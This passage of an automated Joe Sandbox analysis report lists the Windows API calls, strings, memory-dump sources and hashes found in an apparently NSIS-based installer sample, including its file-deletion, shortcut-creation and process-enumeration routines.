                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                            • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                            • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                            • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                            • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                            • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                            • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                            • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                            • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                            • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                            • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                            • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                            • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                            • String ID: F$A
                                                                                                                                                                                                                                                                                            • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                            • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                            • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                            • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                            • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                            • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                            • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                            • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                            • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                            • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                                                                                                                                                            • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                            • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                            • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                            • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                            • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                            • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                            • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                            • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                            • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                            • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
